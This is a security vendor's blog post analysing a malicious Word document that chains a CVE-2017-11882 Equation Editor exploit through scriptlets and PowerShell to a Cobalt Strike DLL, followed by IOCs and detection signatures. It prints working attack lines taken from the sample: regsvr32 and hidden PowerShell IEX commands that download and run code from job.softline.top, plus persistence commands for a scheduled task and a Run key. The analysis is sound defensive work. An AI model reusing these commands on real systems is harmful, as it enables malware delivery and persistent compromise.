Walkthrough of a Common Malware Carrier

Posted on 2018-04-19 by Pedram Amini

E-mail is a prominent vector for malware delivery, by way of a malicious URL or file attachments. When embedding malicious content within a file, malware authors commonly nest a variety of formats within one another and pivot through numerous stages of payloads before retrieving the final one. In this post, we'll walk through the dissection of a common document malware carrier.

The sample we'll dive into originally popped up on our radar a week ago, on Thursday April 12th 2018. Received through one of our VirusTotal Intelligence YARA hunt rules that search for suspicious Office documents with an external reference (more on this in a second). This Tweet from @blu3_team a few hours ago succinctly illustrated the behavior of this common carrier type, we'll dive deeper into the step-by-step analysis. We've made the original sample, subsequent stage payloads, and some intermediary files available on our GitHub InQuest/malware-samples. The initial malicious document:

On initial upload last week there were only three AV hits on the sample (Kaspersky, ZoneAlarm, and Zoner). Today, upon subsequent rescan, there were six:

On 4/12 the detection ration was 3/59, on 4/19 it is 6/59.

The file is a Microsoft Office .docx file, which means you can simply rename it to .zip to extract and inspect the contents. Let's grep out the URL ignoring some common domains we don't care about:

$ grep -rEo '(http|https)://[^"]+' * | cut -d':' -f2- | grep -Ev "adobe.com|w3.org|openxmlformats.org|microsoft.com" | sort | uniq
http://job.softline.top/banner.jpg
http://purl.org/dc/dcmitype/
http://purl.org/dc/elements/1.1/
http://purl.org/dc/terms/

That first one pops out immediately. Let's see which file contains that particular URL and then inspect the file in its entirety:

$ grep -lr http://job.softline.top/banner.jpg
word/_rels/webSettings.xml.rels

$ cat word/_rels/webSettings.xml.rels
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships
xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://job.softline.top/banner.jpg" TargetMode="External"/>
</Relationships>

There's the external reference we were alluding to earlier. At this point, a user will have opened the initial carrier and activated this reference. Retrieving the next stage payload banner.jpg, you'll immediately notice the file is actually an RTF document and not a JPG image. We'll use rtfobj to dissect this further by requesting it dump all the objects out of the RTF stream:

$ rtfobj -s all banner.jpg -d objects
rtfobj 0.51 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'banner.jpg' - size: 108109 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |0000ED3Ah |format_id: 2 (Embedded)        |Not an OLE Package
   |          |class name: 'Equation.3'       |
   |          |data size: 3072                |
---+----------+-------------------------------+-------------------------------
1  |00010E11h |format_id: 2 (Embedded)        |Not an OLE Package
   |          |class name: 'Equation.3'       |
   |          |data size: 3072                |
---+----------+-------------------------------+-------------------------------

Saving file embedded in OLE object #0:
  format_id  = 2
  class name = 'Equation.3'
  data size  = 3072
  saving to file objects/banner.jpg_object_0000ED3A.bin

Saving file embedded in OLE object #1:
  format_id  = 2
  class name = 'Equation.3'
  data size  = 3072
  saving to file objects/banner.jpg_object_00010E11.bin

$ file *
banner.jpg_object_0000ED3A.bin: Composite Document File V2 Document, Cannot read section info
banner.jpg_object_00010E11.bin: Composite Document File V2 Document, Cannot read section info

Two Composite Document Files (CDF). We'll use oledump to list the streams in both of the dumped objects banner.jpg_object_0000ED3A.bin and banner.jpg_object_00010E11.bin:

$ oledump.py banner.jpg_object_0000ED3A.bin
  1:       102 '\x01CompObj'
  2:        20 '\x01Ole'
  3:         6 '\x03ObjInfo'
  4:       197 'Equation Native'

$ oledump.py banner.jpg_object_00010E11.bin
  1:       102 '\x01CompObj'
  2:        20 '\x01Ole'
  3:         6 '\x03ObjInfo'
  4:       197 'Equation Native'

Each dumped object contains an "Equation Native" stream. These OLE streams contain exploits for the Microsoft Equation Editor vulnerabilities described in CVE-2017-11882 and CVE-2018-0802. For an example proof-of-concept exploit, see github/rxwx/CVE-2018-0802. Let's dump each of those streams:

$ oledump.py banner.jpg_object_0000ED3A.bin -s4
00000000: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00  ......�ĩ.......
00000010: C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03  ȧ\.��[.........
00000020: 0A 0A 01 08 5A 5A 33 C0 99 B2 02 C1 E2 08 2B E2  ....ZZ3���.��.+�
00000030: E8 FF FF FF FF C3 5B 50 64 8B 40 30 8B 40 08 99  ������[Pd�@0�@.�
00000040: B2 03 C1 E2 10 66 BA 12 0C 03 C2 8D 5B 1C 53 FF  �.��.f�...[.S�
00000050: E0 72 65 67 73 76 72 33 32 20 2F 75 20 2F 73 20  �regsvr32 /u /s
00000060: 2F 69 3A 68 74 74 70 3A 2F 2F 6A 6F 62 2E 73 6F  /i:http://job.so
00000070: 66 74 6C 69 6E 65 2E 74 6F 70 2F 61 64 31 2E 6A  ftline.top/ad1.j
00000080: 70 67 20 73 63 72 6F 62 6A 2E 64 6C 6C 20 23 20  pg scrobj.dll #
00000090: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000000A0: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000000B0: 20 20 20 20 20 20 20 20 20 20 25 00 00 00 00 00            %.....
000000C0: 00 00 00 00 00

$ oledump.py banner.jpg_object_00010E11.bin -s4
00000000: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00  ......�ĩ.......
00000010: C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03  ȧ\.��[.........
00000020: 0A 0A 01 08 5A 5A B8 44 EB 71 12 BA 78 56 34 12  ....ZZ�D�q.�xV4.
00000030: 31 D0 8B 08 8B 09 8B 09 66 83 C1 3C 31 DB 53 51  1Ћ.�.�.f��<1�SQ
00000040: BE 64 3E 72 12 31 D6 FF 16 53 66 83 EE 4C FF 10  �d>r.1��.Sf��L�.
00000050: 90 90 14 21 40 00 00 00 72 65 67 73 76 72 33 32  ��.!@...regsvr32
00000060: 20 2F 75 20 2F 73 20 2F 69 3A 68 74 74 70 3A 2F   /u /s /i:http:/
00000070: 2F 6A 6F 62 2E 73 6F 66 74 6C 69 6E 65 2E 74 6F  /job.softline.to
00000080: 70 2F 61 64 31 2E 6A 70 67 20 73 63 72 6F 62 6A  p/ad1.jpg scrobj
00000090: 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00  .dll............
000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000C0: 00 00 00 00 00                                   .....

We'll focus on the first of the two, banner.jpg_object_0000ED3A.bin. For further reading on the specific of Equation Editor vulnerabilities we recommend the following articles from Checkpoint and Freebuf. Aligning the vulnerabile structure with the data above we have the following table:

struct member description size offset
Tag 0×08 1 byte 0x23
Ttype Typeface number 1 byte 0x24
Style Font style 1 byte 0x25
Name Font name NULL-terminated ASCII string 0x26 - 0x93

The vulnerability was initially patched in November of last year. That patch proved insufficient and subsequently in December of last year Microsoft simply removed the Equation Editor in its entirety. The above analysis of course can be skipped entirely as the next stage payload is clearly visible in both objects referencing ad1.jpg, which contains nothing more than a scriptlet pivot through JavaScript and PowerShell to yet another payload:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <script language="JScript">
        <![CDATA[
            ps  = "powershell.exe -exec bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('http://job.softline.top/share.png')";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
</script>
</registration>
</scriptlet>

Following the rabbit down the hole further, we get the following PowerShell pivot from share.png:

function ConvertFrom-Base64($string) {
   $bytes  = [System.Convert]::FromBase64String($string);
   $decoded = [System.Text.Encoding]::UTF8.GetString($bytes);
   return $decoded;
}

$WSH = New-Object -Com WScript.Shell;
$decode = ConvertFrom-Base64("c2NodGFza3MgL2NyZWF0ZSAvdG4gIndpbmRvd3MgdXBkYXRlIiAvdHIgInJlZ3N2cjMyIC91IC9zIC9pOmh0dHA6Ly9qb2Iuc29mdGxpbmUudG9wL2FkMi5qcGcgc2Nyb2JqLmRsbCIgL3NjIGRhaWx5IC9zdCAxMjowMCAvRg==");
$WSH.Run($decode,0);

$client = new-object System.Net.WebClient
$client.DownloadFile('http://job.softline.top/SCHEDLGU.exe', 'c:\\windows\\tasks\\SCHEDLGU.exe')
$decode3 = ConvertFrom-Base64("cmVnIGFkZCAiSEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIiAvdiAid2luZG93cyB0YXNrcyBjaGVjayIgL3QgUkVHX1NaIC9kICJjOlx3aW5kb3dzXHRhc2tzXFNDSEVETEdVLmV4ZSIgL2Y=");
$WSH.Run($decode3,0);

$decode2 = ConvertFrom-Base64("cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1XaW5kb3dzdHlsZSBoaWRkZW4gLW5vbmludGVyYWN0aXZlIC1ub2xvZ28gSUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vam9iLnNvZnRsaW5lLnRvcC9sb2FkaW5nbGl0LmdpZicp");
$WSH.Run($decode2,0);

There's a plethora of methods to decoding the base64 data above, but sticking with the tool-set we've been using, we'll lean on base64dump here:

$ base64dump.py -n30 share.png -s a -S
schtasks /create /tn "windows update" /tr "regsvr32 /u /s /i:http://job.softline.top/ad2.jpg scrobj.dll" /sc daily /st 12:00 /F

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "windows tasks check" /t REG_SZ /d "c:\windows\tasks\SCHEDLGU.exe" /f

powershell.exe -exec bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('http://job.softline.top/loadinglit.gif')

Three commands. It looks to pull down a payload and to establish persistence across reboots by way of a Registry run-key and scheduled tasks (how uncreative). Additionally, we've got a pair of new pivots to follow here. As it turns out, ad2.jpg is nothing more than a JavaScript / PowerShell pivot to loadinglit.gif:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <script language="JScript">
        <![CDATA[
            ps  = "powershell.exe -exec bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('http://job.softline.top/loadinglit.gif')";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
</script>
</registration>
</scriptlet>

Examining loadinglit.gif we find a pure PowerShell payload that contains a base64 encoded PE file. This is obvious from the string start of "TVroAAAAAFt" which, if you've been looking at these things long enough, immediately stands out as an MZ header for a Windows PE executable (DLL, EXE, etc.). The script is too large to include inline, see the link above. Again though, we'll lean on base64dump to extract the payload:

$ base64dump.py -n500 loadinglit.gif
ID  Size    Encoded          Decoded          MD5 decoded
--  ----    -------          -------          -----------
 1:  275804 TVroAAAAAFtSRVWJ MZ�....[REU���r 9d7376f5ad1b39ec08cbe2a8e0e886b6

$ base64dump.py -n500 loadinglit.gif -s1 -d > payload

$ sha256sum payload
8cdd29e28daf040965d4cad8bf3c73d00dde3f2968bab44c7d8fe482ba2057f9  payload

$ file payload
payload: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

This final payload has not been seen on VT / MetaDefender before, so we uploaded to both services. It appears to be a Cobalt Strike payload:

Detection

We've examined the various pivots in this malware carrier that resulted in the eventual delivery of a persistently hooked malicious binary. The InQuest Deep File Inspection (DFI) stack is capable of unraveling common malware carriers such as the one detailed in this post. There are countless methods that attackers can employ to obfuscate, evade, encapsulate, and generally deter security inspection. Our DFI stack strips away the superfluous and exposes malicious content bare for threat detection based on any of our 1000+ field tested hunting signatures, user-defined YARA signatures, or any of our active integrations.

Malware carriers are typically nested in multiple levels, like a Matryoshka doll.

In addition to Deep File Inspection, we provide other capabilities for discovering and detecting targeted malware campaigns. Following along with our example, let's take a look at the hosting provider behind the various payload stages we retrieved. The domain, softline.top (WHOIS), was registered in late December of last year. There is not DNS resolution for the TLD. The subdomain job.softline.top is hosted on South Korean IP address 27.255.90.218 (WHOIS):

$ whois softline.top
...
Domain Name: softline.top
Registry Domain ID: D20171226G10001G_32819662-top
Registrar WHOIS Server: whois.publicdomainregistry.com
Registrar URL: http://publicdomainregistry.com
Updated Date: 2017-12-26T08:51:22Z
Creation Date: 2017-12-26T08:50:51Z
Registry Expiry Date: 2018-12-26T08:50:51Z
Registrar: PDR Ltd
Registrar IANA ID: 303
...

$ dig job.softline.top any
...
;; ANSWER SECTION:
job.softline.top. 51  IN  A 27.255.90.218
...

A reverse IP lookup on 27.255.90.218 reveals another domain microsoftgood.com (WHOIS) which was registered even more recently:

$ whois microsoftgood.com
...
Domain Name: microsoftgood.com
Registry Domain ID: 2221771516_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-02-01T02:55:46Z
Creation Date: 2018-02-01T02:55:46Z
Registrar Registration Expiration Date: 2019-02-01T02:55:46Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
...

Whether or not there is any relation is speculative at this point. It may be potentially lucrative from a defenders perspective to utilize the naming patterns gleans above to conduct a limited brute force crawl of this new domain, in search of additional malware.

IP and DNS are both detectable / alertable artifacts within InQuest. Users can lean on our weekly feed of intel updates as well integrate with their own propriety intel or commercial third party feeds to detect command and control (C2) activity. Campaigns can be alerted on by file heuristics, communicated endpoints, hashes, fuzzy hashes, perception hashes (images), header (HTTP and SMTP) analytics, and an ever growing list of active integrations.

As an example active integration, let's take a look at how our friends at VMRay detect this threat. If enabled, file artifacts carved by InQuest from the wire can be optionally passed through the VMRay sandbox for detonation and behavioral inspection:

VMRay detonated the file in four different environments, only one alerted.

Starting from the overview, you'll note that VMRay detonated the file in four different unique environments. Only one of which alerted. It is prudent to accurately build your sandbox environment to reflect your real-world systems. The next screen shows the process overview:

Clear depiction of the multiple stage pivots detailed above.

You can clearly see some of the pivots we detailed above. From Microsoft Word through the RTF payload (banner.jpg) to the Equation Editor pivot, through regsvr32.exe (ad1.jpg) and finally to PowerShell. Some of the scriptlets in-between are not depicted here, though they are captured and scored independently in InQuest. There's value in defense-in-depth. A more detailed but similar view:

Detailed information on various commands executed by the malware.

Shows the complete command line arguments from those captured pivots. The results from this, and any other integrations, are aggregated under a single pane of glass and summarized by a simple threat score from 1 to 10. Our threat score algorithm is not prone to artificial inflation from over-detection. We lean on our experiences as SOC analysts to automate the heating / cooling of scores based on a combination of inputs. In essence, we're automating much of the SOC analyst work flow to spare precious human cycles for what matters most. The key decision points that drive the algorithm are shown in an straightforward threat receipt:

There are over 20 factors considered when applying a threat score to a captured session.

The indicators beside each row in the threat receipt state:

  • Green, the subsystem alerted and contributed to the threat score.
  • Yellow, the subsystem alerted but that alert did not contribute to the threat score.
  • Red, the subsystem did not produce an alert.
  • Grey, the subsystem was not available at the time of analysis (or is not configured / enabled).

At a glance, the InQuest threat receipt provides analysts with an idea as to whether or not the threat is a true positive and why. In this particular case the InQuest Threat Detection Engine scored the session containing the initial carrier as a 9 and then bumped the score to a 10 based on InQuest cloud assisted IP reputation. Both the OPSWAT (multi-av) and VMRay (sandbox / detonation) subsystems alerted as well, but did not alter the final score.

On a final note, InQuest customers can hunt for signs of this and similar campaigns via the following DFI powered signatures:

  • 5000755, MC_CVE_2017_11882_OLE, severity 8, confidence 7.
  • 5000757, MC_Equation_OLE, severity 8, confidence 7.
  • 5000806, MC_Malicious_Scriptlet_Payload_01, severity 10, confidence 5.
  • 5000487, MC_SCT_Backdoor, severity 9, confidence 9.
  • 3000175, SC_RTF_Objupdate, severity 5, confidence 2.

malware-analysis matryoshka